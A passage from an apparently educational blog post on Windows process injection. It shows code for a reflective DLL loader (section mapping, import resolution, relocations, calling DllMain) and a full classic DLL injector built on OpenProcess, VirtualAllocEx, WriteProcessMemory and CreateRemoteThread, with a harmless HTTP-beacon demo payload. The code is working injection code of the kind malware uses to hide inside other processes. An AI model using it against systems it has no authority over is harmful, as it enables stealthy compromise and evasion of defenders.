        PIMAGE_OPTIONAL_HEADER64 pCurrentDLLModuleOptionalHeader = &pCurrentDLLModuleNTHeaders->OptionalHeader;
        PIMAGE_SECTION_HEADER pCurrentSectionHeader = (PIMAGE_SECTION_HEADER)(pCurrentDLLModuleNTHeaders->FileHeader.SizeOfOptionalHeader + (LPBYTE)pCurrentDLLModuleOptionalHeader);

        for (DWORD i = 0; i < numberOfSections; i++) {

                if (pCurrentSectionHeader->SizeOfRawData != 0) {
                        LPBYTE pDestinationAddress = (LPBYTE)pMappedCurrentDLL + pCurrentSectionHeader->VirtualAddress;
                        LPBYTE pSourceAddress = (LPBYTE)pCurrentDLLModule + pCurrentSectionHeader->PointerToRawData;
                        DWORD currentSectionRawSize = pCurrentSectionHeader->SizeOfRawData; // We copy the entire section, if an entire section is not needed in memory the unneeded portion will be overwritten by another section

                        // Use a separate index so the outer section counter is not shadowed
                        for (DWORD j = 0; j < currentSectionRawSize; j++) {
                                pDestinationAddress[j] = pSourceAddress[j];
                        }
                }

                pCurrentSectionHeader++;
        }

Map the PE Sections into Memory
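The key idea in this step is that a section lives at PointerToRawData in the file layout but must end up at VirtualAddress in the mapped layout. The following is a minimal sketch of that translation on plain buffers. The section_t struct and map_sections function are hypothetical simplifications of IMAGE_SECTION_HEADER, and memcpy is used for brevity even though the real loader has to copy byte by byte because it cannot call any imported function.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Only the three section header fields the mapping step needs. */
typedef struct {
    uint32_t virtual_address;     /* RVA of the section once mapped */
    uint32_t size_of_raw_data;    /* bytes stored in the file */
    uint32_t pointer_to_raw_data; /* file offset of those bytes */
} section_t;

/* Copy every section from its file offset to its RVA.
 * Returns the number of sections copied, or -1 if one would fall out of bounds. */
static int map_sections(uint8_t *mapped, size_t mapped_len,
                        const uint8_t *raw, size_t raw_len,
                        const section_t *sections, size_t count)
{
    assert(mapped != NULL && raw != NULL && sections != NULL);
    int copied = 0;
    for (size_t i = 0; i < count; i++) {
        const section_t *s = &sections[i];
        if (s->size_of_raw_data == 0) continue; /* e.g. .bss has no file data */
        size_t src_end = (size_t)s->pointer_to_raw_data + s->size_of_raw_data;
        size_t dst_end = (size_t)s->virtual_address + s->size_of_raw_data;
        if (src_end > raw_len || dst_end > mapped_len) return -1;
        memcpy(mapped + s->virtual_address,
               raw + s->pointer_to_raw_data,
               s->size_of_raw_data);
        copied++;
    }
    return copied;
}
```

Sections with no raw data are skipped and simply stay zeroed in the destination, which matches the SizeOfRawData check in the loader.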

Resolve the IAT of the Mapped Version of Reflective DLL Payload

        PIMAGE_NT_HEADERS64 pMappedCurrentDLLNTHeader = (PIMAGE_NT_HEADERS64)(((PIMAGE_DOS_HEADER)pMappedCurrentDLL)->e_lfanew + (LPBYTE)pMappedCurrentDLL);
        PIMAGE_IMPORT_DESCRIPTOR pMappedCurrentDLLImportDescriptor = (PIMAGE_IMPORT_DESCRIPTOR)(pMappedCurrentDLLNTHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress + (LPBYTE)pMappedCurrentDLL);

        while (pMappedCurrentDLLImportDescriptor->Name != NULL) {
                LPSTR currentDLLName = (LPSTR)(pMappedCurrentDLLImportDescriptor->Name + (LPBYTE)pMappedCurrentDLL);
                HMODULE hCurrentDLLModule = pLoadLibraryAAddress(currentDLLName);

                PIMAGE_THUNK_DATA64 pImageThunkData = (PIMAGE_THUNK_DATA64)(pMappedCurrentDLLImportDescriptor->FirstThunk + (LPBYTE)pMappedCurrentDLL);

                while (pImageThunkData->u1.AddressOfData) {

                        if (pImageThunkData->u1.Ordinal & 0x8000000000000000) {
                                // Import is by ordinal

                                FARPROC resolvedImportAddress = pGetProcAddressAddress(hCurrentDLLModule, MAKEINTRESOURCEA(pImageThunkData->u1.Ordinal));

                                if (resolvedImportAddress == NULL) {
                                        return;
                                }

                                // Overwrite entry in IAT with the address of resolved function
                                pImageThunkData->u1.AddressOfData = (ULONGLONG)resolvedImportAddress;

                        }
                        else {
                                // Import is by name
                                PIMAGE_IMPORT_BY_NAME pAddressOfImportData = (PIMAGE_IMPORT_BY_NAME)((pImageThunkData->u1.AddressOfData) + (LPBYTE)pMappedCurrentDLL);
                                FARPROC resolvedImportAddress = pGetProcAddressAddress(hCurrentDLLModule, pAddressOfImportData->Name);

                                if (resolvedImportAddress == NULL) {
                                        return;
                                }

                                // Overwrite entry in IAT with the address of resolved function
                                pImageThunkData->u1.AddressOfData = (ULONGLONG)resolvedImportAddress;

                        }

                        pImageThunkData++;
                }

                pMappedCurrentDLLImportDescriptor++;
        }

Resolve IAT
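Each 64-bit thunk in the import table encodes either an ordinal or the RVA of an IMAGE_IMPORT_BY_NAME entry, and the loop above branches on the top bit to tell them apart. The following is a minimal sketch of that decoding on plain integers and buffers. The names import_ref_t, decode_thunk64, and import_name are hypothetical helpers for illustration only.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define ORDINAL_FLAG64 0x8000000000000000ull /* same value as IMAGE_ORDINAL_FLAG64 */

typedef struct {
    int      by_ordinal; /* non-zero when the import is by ordinal */
    uint16_t ordinal;    /* valid when by_ordinal is set */
    uint32_t name_rva;   /* RVA of the hint/name entry otherwise */
} import_ref_t;

/* Split a 64-bit thunk into "ordinal" or "RVA of hint/name entry". */
static import_ref_t decode_thunk64(uint64_t thunk)
{
    import_ref_t ref = {0, 0, 0};
    if (thunk & ORDINAL_FLAG64) {
        ref.by_ordinal = 1;
        ref.ordinal = (uint16_t)(thunk & 0xffffu);     /* low 16 bits */
    } else {
        ref.name_rva = (uint32_t)(thunk & 0x7fffffffu); /* low 31 bits */
    }
    return ref;
}

/* A hint/name entry is a 2-byte hint followed by a NUL-terminated name.
 * Returns the name, or NULL if it does not fit inside the image. */
static const char *import_name(const uint8_t *image, size_t image_len, uint32_t name_rva)
{
    assert(image != NULL);
    if ((size_t)name_rva + 2 >= image_len) return NULL;
    const uint8_t *name = image + name_rva + 2;
    size_t remaining = image_len - ((size_t)name_rva + 2);
    if (memchr(name, '\0', remaining) == NULL) return NULL;
    return (const char *)name;
}
```

In the loader the decoded ordinal or name is what gets handed to GetProcAddress, and the returned address then overwrites the thunk itself.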

Update the Base Relocation Table of the Reflective DLL Payload

Lastly, the Base Relocation Table will need to be updated in order to ensure that any hardcoded address in the DLL will resolve properly with the new base offset.

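        DWORD numberOfRelocEntires;
        PIMAGE_BASE_RELOCATION pCurrentBaseRelocation = (PIMAGE_BASE_RELOCATION)(pMappedCurrentDLLNTHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress + (LPBYTE)pMappedCurrentDLL);
        PIMAGE_RELOC pCurrentBaseRelocationEntry;

        // Difference between where the DLL was actually mapped and the ImageBase it was linked for
        ULONG_PTR baseAddressDelta = (ULONG_PTR)pMappedCurrentDLL - (ULONG_PTR)pMappedCurrentDLLNTHeader->OptionalHeader.ImageBase;

        while (pCurrentBaseRelocation->VirtualAddress != 0) {

                numberOfRelocEntires = ((pCurrentBaseRelocation->SizeOfBlock) - 0x8) / 0x2;
                pCurrentBaseRelocationEntry = (PIMAGE_RELOC)((LPBYTE)pCurrentBaseRelocation + sizeof(IMAGE_BASE_RELOCATION));

                // Start of the page that this relocation block describes
                LPBYTE pRelocationPage = (LPBYTE)pMappedCurrentDLL + pCurrentBaseRelocation->VirtualAddress;

                for (DWORD i = numberOfRelocEntires; i != 0; i--) {
                        if (pCurrentBaseRelocationEntry->type == IMAGE_REL_BASED_DIR64) {
                                // Patch the 64-bit absolute address (assumes IMAGE_RELOC exposes a 12-bit offset field next to type)
                                *(ULONG_PTR*)(pRelocationPage + pCurrentBaseRelocationEntry->offset) += baseAddressDelta;
                        }
                        pCurrentBaseRelocationEntry++;
                }

                pCurrentBaseRelocation = (PIMAGE_BASE_RELOCATION)((LPBYTE)pCurrentBaseRelocation + pCurrentBaseRelocation->SizeOfBlock);
        }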

Fix the Base Relocation Table
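To make the relocation arithmetic concrete, the following is a minimal sketch that walks relocation blocks inside a plain byte buffer and patches every IMAGE_REL_BASED_DIR64 entry by a delta (actual base minus preferred ImageBase). The function and helper names are hypothetical, and the buffer stands in for the mapped image. Each block is an 8-byte header (page RVA, block size) followed by 16-bit entries whose top 4 bits are the type and low 12 bits are the offset within the page.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define REL_BASED_DIR64 10u /* same value as IMAGE_REL_BASED_DIR64 */

static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}
static uint64_t rd64(const uint8_t *p) {
    uint64_t v = 0;
    for (int i = 7; i >= 0; i--) v = (v << 8) | p[i];
    return v;
}
static void wr64(uint8_t *p, uint64_t v) {
    for (int i = 0; i < 8; i++) { p[i] = (uint8_t)(v & 0xff); v >>= 8; }
}

/* Apply all DIR64 relocations starting at `reloc_rva`.
 * Returns the number of patched addresses, or -1 on an out-of-bounds target. */
static int apply_relocations(uint8_t *image, size_t image_len,
                             uint32_t reloc_rva, uint64_t delta)
{
    assert(image != NULL);
    size_t block = reloc_rva;
    int patched = 0;
    while (block + 8 <= image_len) {
        uint32_t page_rva = rd32(image + block);
        uint32_t block_size = rd32(image + block + 4);
        if (page_rva == 0 || block_size < 8 || block + block_size > image_len) break;
        size_t entries = (block_size - 8) / 2;
        for (size_t i = 0; i < entries; i++) {
            uint16_t entry = rd16(image + block + 8 + 2 * i);
            unsigned type = entry >> 12;
            size_t target = (size_t)page_rva + (entry & 0x0fffu);
            if (type != REL_BASED_DIR64) continue; /* e.g. ABSOLUTE padding */
            if (target + 8 > image_len) return -1;
            wr64(image + target, rd64(image + target) + delta);
            patched++;
        }
        block += block_size;
    }
    return patched;
}
```

For example, with a preferred base of 0x180000000 and an actual base of 0x7ff600000000, a stored pointer of 0x180001234 becomes 0x7ff600001234 after patching.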

Invoke DLLMain of the Reflective DLL Payload

Now with the DLL Headers and PE Sections mapped, IAT entries resolved, and Base Relocation Table fixed, the DLLMain of the DLL can be invoked.

        ULONG_PTR pDllEntryPoint = (ULONG_PTR)(pMappedCurrentDLLNTHeader->OptionalHeader.AddressOfEntryPoint + (LPBYTE)pMappedCurrentDLL);

        pFlushInstructionCache((HANDLE)-1, NULL, 0);

        typedef BOOL(WINAPI* DLLMAIN)(HINSTANCE, DWORD, LPVOID);
        ((DLLMAIN)pDllEntryPoint) ((HINSTANCE)pMappedCurrentDLL, DLL_PROCESS_ATTACH, NULL);

Invoke Entrypoint

Reflective DLL Injection Demonstration

The following GIF provides a video demonstration of the injection process. We can see the injector running and injecting into a Notepad process (PID 8020). Once this occurs there is thread activity in the Notepad process. Shortly after, HTTP activity begins in Wireshark, indicating a successful injection.

Injection Demonstration

Digging deeper into the Notepad process inside of Process Hacker we can see a memory section that is readable, writable, and executable containing our injected DLL Payload.

Injected DLL Payload in Memory

We can also see WINHTTP.DLL loaded into Notepad. Of course, this is not loaded by Notepad itself but by our DLL Payload, which requires it for its functionality.

WINHTTP.DLL loaded after the IAT was resolved

Implementing DLL Injection

Aleks — Wed, 24 May 2023 16:56:26 GMT

Introduction

This post will introduce and cover the core concepts related to DLL Injection, including use cases, implementation, and identifying the technique during reverse engineering.

DLL Injection is a method of injecting code into another process. As the name implies, the core method involves injecting a DLL into the process and executing the contents of the DLL. This technique has multiple legitimate and illegitimate use cases.

The Windows operating system itself has support for DLL Injection and actively depends on the technique for the functionality of certain components. Primarily the native presence of DLL Injection can be found in the Win32 API function SetWindowsHookExA. However, this post will discuss another method of invoking DLL Injection.

Source Code for Examples

The source code associated with this post can be found on the following link.

Introduction to DLL Injection

There are two components in the DLL Injection lifecycle:

DLL Payload: The core payload that will be injected into another process.
DLL Injection Loader: The program responsible for performing the core injection logic and injecting the DLL Payload into another process.

DLL Injection involves the following steps:

Open a process handle to a remote process.
Allocate a region of memory in the remote process and copy the full path of the DLL Payload located on disk (For example, C:\file.dll).
Use CreateRemoteThread to execute LoadLibraryA (or LoadLibraryW when the path is a wide string, as in the implementation in this post) in the target process while also passing the region of memory from step #2 as its argument.

The goal of this entire process is to run the LoadLibrary function inside of a remote process and pass in the path of our DLL Payload.

Creating DLL Injection Payload

For example purposes, a DLL file that makes HTTP requests to Google will be used as a payload that will be injected into a foreign process. HTTP requests were chosen as it is simple to visually see the feedback in a tool such as Wireshark or any other network monitoring mechanism. This will provide the necessary feedback required to understand if this logic has been successfully injected into another process.

The core of the DLL payload is a function named sendHTTPRequest that will make use of the Windows Internet (WinINet) API functions to call out to Google.

int sendHTTPRequest() {

        LPCSTR userAgent = "agent";
        LPCSTR connectDomain = "google.com";
        LPCSTR httpRequestType = "GET";
        LPCSTR targetPath = "/test";

        HINTERNET internetHandle = InternetOpenA(userAgent, INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
        if (internetHandle == NULL) {
                return -1;
        }

        // Passed as the dwContext argument of the WinINet calls below; no context is needed
        DWORD_PTR dwContext = 0;

        HINTERNET httpHandle = InternetConnectA(internetHandle, connectDomain, INTERNET_DEFAULT_HTTP_PORT, NULL, NULL, INTERNET_SERVICE_HTTP, 0, dwContext);
        if (httpHandle == NULL) {
                InternetCloseHandle(internetHandle);
                return -1;
        }

        HINTERNET httpRequestHandle = HttpOpenRequestA(httpHandle, httpRequestType, targetPath, NULL, NULL, NULL, 0, dwContext);
        if (httpRequestHandle == NULL) {
                InternetCloseHandle(httpHandle);
                InternetCloseHandle(internetHandle);
                return -1;
        }

        BOOL result = HttpSendRequestA(httpRequestHandle, NULL, 0, NULL, 0);

        // Close every handle so the two-second loop does not leak them
        InternetCloseHandle(httpRequestHandle);
        InternetCloseHandle(httpHandle);
        InternetCloseHandle(internetHandle);

        return result ? 1 : -1;
}

HTTP Request Function that acts as our "Payload"

There is a wrapper function named loopHTTPConnect responsible for calling sendHTTPRequest every two seconds.

void loopHTTPConnect() {

        while (true) {
                Sleep(2000);
                sendHTTPRequest();
        }
}

Function that loops through the "Payload" function

The loopHTTPConnect function will be invoked in a thread spawned in DLLMain whenever the DLL is loaded into a process.

Implementing DLL Injection

1️⃣

Open Handle to Remote Process

The first step is to open a handle to the target process we would like to inject code into.

In this case OpenProcess is used to open a specific target process through its PID. The process handle is opened with three access rights:

PROCESS_VM_OPERATION: Provides the ability to manipulate the address space of the target process, such as allocating and freeing memory.
PROCESS_VM_WRITE: Provides the ability to write to the target process address space.
PROCESS_CREATE_THREAD: Provides the ability to create new threads within the running target process.

All three of these access rights will allow for the core steps related to the injection process to succeed.

HANDLE hTargetProcess = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE, FALSE, injectionTargetProcessID);
if (hTargetProcess == NULL) {
        std::string errorMessage = GetLastErrorAsString();
        std::cout << "Failed to acquire handle to process: " << errorMessage << "\n";
        return -1;
}

Opening a Process for DLL Injection

2️⃣

Allocate Buffer in Remote Process for DLL Path

The next step involves allocating a buffer in the target process with VirtualAllocEx. This buffer will be used to store a string containing the path of the DLL payload on the filesystem that we would like to inject into the process.

Note that this buffer is given the memory protection PAGE_READWRITE. It will only ever be written to by the injection loader and read by the target process, so read and write permissions are sufficient and execute permission is not needed.

LPVOID remoteBuffer = VirtualAllocEx(hTargetProcess, NULL, sizeof(dllPayloadPath), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
if (remoteBuffer == NULL) {
        std::string errorMessage = GetLastErrorAsString();
        std::cout << "Failed to allocate memory in target process: " << errorMessage << "\n";

        CloseHandle(hTargetProcess);

        return -1;
}

Allocating a Buffer in Target Process to Hold DLL Path used for injection

3️⃣

Write Path of DLL Payload to Allocated Memory

After a memory buffer has been allocated in the target process the path to the DLL payload must now be written to it. The path to the DLL payload is defined as:

wchar_t dllPayloadPath[] = L"C:\\DLLPayload.dll";

Path of DLL Payload to Inject Written as a Wide String
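The allocation and write steps both need the size of this path in bytes, including the terminating null character. Using sizeof on dllPayloadPath works only because it is declared as an array; if the path were held in a pointer, sizeof would return the pointer size instead. The following is a minimal sketch of a helper that gives the right byte count in either case. The name wide_path_bytes is hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <wchar.h>

/* Number of bytes needed to store a wide string, terminator included.
 * On Windows wchar_t is 2 bytes; the code does not depend on that width. */
static size_t wide_path_bytes(const wchar_t *path)
{
    assert(path != NULL);
    return (wcslen(path) + 1) * sizeof(wchar_t);
}
```

For an array such as dllPayloadPath this returns the same value as sizeof(dllPayloadPath), so either form can be passed to VirtualAllocEx and WriteProcessMemory as long as the same size is used for both calls.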

WriteProcessMemory will be used to write this string to the newly allocated memory buffer in the target process.

if (!WriteProcessMemory(hTargetProcess, remoteBuffer, (LPVOID)dllPayloadPath, sizeof(dllPayloadPath), NULL)) {
        std::string errorMessage = GetLastErrorAsString();
        std::cout << "Failed to write DLL path to target process: " << errorMessage << "\n";

        VirtualFreeEx(hTargetProcess, remoteBuffer, 0, MEM_RELEASE);
        CloseHandle(hTargetProcess);

        return -1;
}

Writing DLL Path String to Allocated Memory Space in Target Process

At this stage we have a buffer in the target process with a path to a DLL on the filesystem.

4️⃣

Load DLL Payload

The last stage will create a thread in the target process with CreateRemoteThread and execute the LoadLibraryW function, a function with the capability of loading DLLs into a process. The LoadLibraryW function will also take in the buffer allocated in the target process containing the full path of the DLL payload we would like to load.

The entire purpose of allocating the memory in the previous step was to have the DLL path within it so it can be passed as a parameter to LoadLibraryW. It is important to remember that the LoadLibraryW function is running inside of the target process and can only access the memory of the target process. This is why we needed to allocate the buffer in the target process.

LPTHREAD_START_ROUTINE pLoadLibraryAddress = (LPTHREAD_START_ROUTINE) LoadLibraryW;
HANDLE hThread = CreateRemoteThread(hTargetProcess, NULL, 0, pLoadLibraryAddress, remoteBuffer, 0, NULL);
if (hThread == NULL) {
        std::string errorMessage = GetLastErrorAsString();
        std::cout << "Failed to create remote thread: " << errorMessage << "\n";
}
else {
        printf("Injection Complete\n");
}

Run LoadLibraryW in the Target Process as a Thread to Load the DLL Payload

One key point to understand is that ASLR does not assign a different base address to certain system DLLs in each process. One of these is Kernel32.dll (the same DLL that contains LoadLibraryW). Its base address is only randomized at boot, after which every process of the same architecture on the system shares the same address.

This point can be demonstrated with the following screenshot where kernel32.dll in Chrome and Edge have the same base address.

Kernel32.dll is loaded at the same address space in all processes

What this means is that the location of LoadLibraryW in the DLL Injector and the target process are the same. This is why we can define the following variable and pass it directly to the CreateRemoteThread function.

LPTHREAD_START_ROUTINE pLoadLibraryAddress = (LPTHREAD_START_ROUTINE) LoadLibraryW;

HANDLE hThread = CreateRemoteThread(hTargetProcess, NULL, 0, pLoadLibraryAddress, remoteBuffer, 0, NULL);
if (hThread == NULL) {
        std::string errorMessage = GetLastErrorAsString();
        std::cout << "Failed to create remote thread: " << errorMessage << "\n";
}
else {
        printf("Injection Complete\n");
}

Defining LoadLibraryW as the Thread to Execute in the Target Process

DLL Injection Demonstration

The following GIF provides a video demonstration of the injection process. When the DLL Injector is executed we can see HTTP traffic begin in the Wireshark window. At the same time, we can see in Process Monitor the process responsible for this traffic is Notepad.

This is an indication of successful injection as Notepad by itself does not conduct any network activities.

Digging deeper, in Process Hacker we can see the buffer allocated to store the DLL payload path inside of Notepad.

Looking into the modules loaded by Notepad, we can also see the name of our payload (DLLPayload.dll).